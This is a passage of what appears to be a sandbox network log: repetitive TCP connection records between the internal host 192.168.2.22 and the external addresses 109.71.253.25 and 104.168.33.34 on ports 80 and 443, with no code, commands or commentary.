                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
                      Source: global trafficTCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
